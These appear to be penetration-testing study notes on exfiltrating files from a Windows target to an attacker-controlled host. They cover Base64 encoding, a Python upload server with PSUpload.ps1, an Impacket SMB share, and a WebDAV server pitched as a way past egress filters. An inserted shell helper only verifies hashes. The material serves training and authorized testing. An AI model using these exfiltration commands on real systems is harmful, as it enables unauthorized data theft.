Target: Windows

File Hash

After every transfer, compute the file's MD5 checksum on both the target and the attack host and compare the two values to confirm the file wasn't corrupted or altered in transit. It's a good habit for file integrity checks.

# Bash
md5sum filename

# PowerShell
Get-FileHash filename -Algorithm MD5

# Cmd
certutil -hashfile filename MD5

Transfer Techniques

Base64 Encode & Decode

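# On the target (Windows PowerShell 5.1; PowerShell 6+ uses -AsByteStream instead of -Encoding byte)
[Convert]::ToBase64String((Get-Content -path "C:\Windows\Public\Desktop\filename" -Encoding byte))
# On the attack host: save the Base64 string to a file, then decode it
cat base64_string_file | base64 -d > filename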
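
Added example (not from the original page): a POSIX shell helper for the receiving side of the Base64 transfer and the File Hash check above. It strips console line wraps and CRLF before decoding, then compares the result with the hash text pasted from `md5sum`, `Get-FileHash` or `certutil`, whatever its layout. The names `normalize_md5` and `decode_and_verify` and the sample values are constructed; GNU coreutils (`md5sum`, `base64`) are assumed.

```shell
#!/bin/sh
# Added example: helper names and sample values are constructed for illustration.

# Print the first MD5 found in pasted tool output as 32 lowercase hex digits.
# Accepts md5sum ("<hash>  file"), Get-FileHash (uppercase, table or list
# layout) and certutil (multi-line; some Windows versions space the bytes).
normalize_md5() {
    printf '%s\n' "$1" | tr -d '\r' | awk '
        {
            # A whole field that is exactly 32 hex digits.
            for (i = 1; i <= NF; i++)
                if (length($i) == 32 && $i ~ /^[0-9A-Fa-f]+$/) {
                    print tolower($i); found = 1; exit
                }
            # A whole line that is 32 hex digits once spaces are removed.
            line = $0; gsub(/[ \t]/, "", line)
            if (length(line) == 32 && line ~ /^[0-9A-Fa-f]+$/) {
                print tolower(line); found = 1; exit
            }
        }
        END { exit !found }'
}

# Decode Base64 text copied from a Windows console (CRLF endings, wrapped
# lines) into $2, then compare its MD5 with the hash text from the source host.
# Returns 0 on match, 1 on mismatch, 2 if no hash was given, 3 on bad Base64.
decode_and_verify() {
    b64_file=$1; out_file=$2; reported=$3
    expected=$(normalize_md5 "$reported") || {
        echo "no MD5 found in reported output" >&2; return 2; }
    tr -d '\r\n \t' < "$b64_file" | base64 -d > "$out_file" || {
        echo "Base64 decode failed; the pasted text is malformed" >&2; return 3; }
    actual=$(normalize_md5 "$(md5sum "$out_file")")
    if [ "$actual" = "$expected" ]; then
        echo "OK $actual"
    else
        echo "MISMATCH expected=$expected actual=$actual" >&2
        return 1
    fi
}

# Constructed sample: certutil-style output for an empty file.
normalize_md5 'MD5 hash of file empty.txt:
d4 1d 8c d9 8f 00 b2 04 e9 80 09 98 ec f8 42 7e
CertUtil: -hashfile command completed successfully.'
```

Call it as `decode_and_verify base64_string_file filename "<pasted hash output>"`; a non-zero return means the decoded file should not be trusted.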

Python Upload Server

# Start Upload Server
python3 -m uploadserver
# To upload from PowerShell, we need to use PSUpload.ps1
# https://github.com/juliourena/plaintext/blob/master/Powershell/PSUpload.ps1
# Transfer PSUpload.ps1 to the target using a fileless method (easier)
# Then use its cmdlets
Invoke-FileUpload -Uri http://TUN0:8000/upload -File C:\Windows\Public\Desktop\filename

SMB Share Methods

# Create an SMB server
python3 /opt/impacket/build/scripts-3.12/smbserver.py share -smb2support .
copy filename \\TUN0\share

WebDAV Method

Most companies only allow outbound HTTP (port 80) or HTTPS (port 443) traffic, so direct SMB connections are often blocked. SMB may still work in some rare cases, but a better alternative is WebDAV, which allows SMB-like file sharing over HTTP/HTTPS. WebDAV enables a web server to function like a file server, making it useful for data exfiltration or remote file access in restricted environments.

wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
copy C:\Windows\Public\Desktop\filename \\TUN0\DavWWWRoot\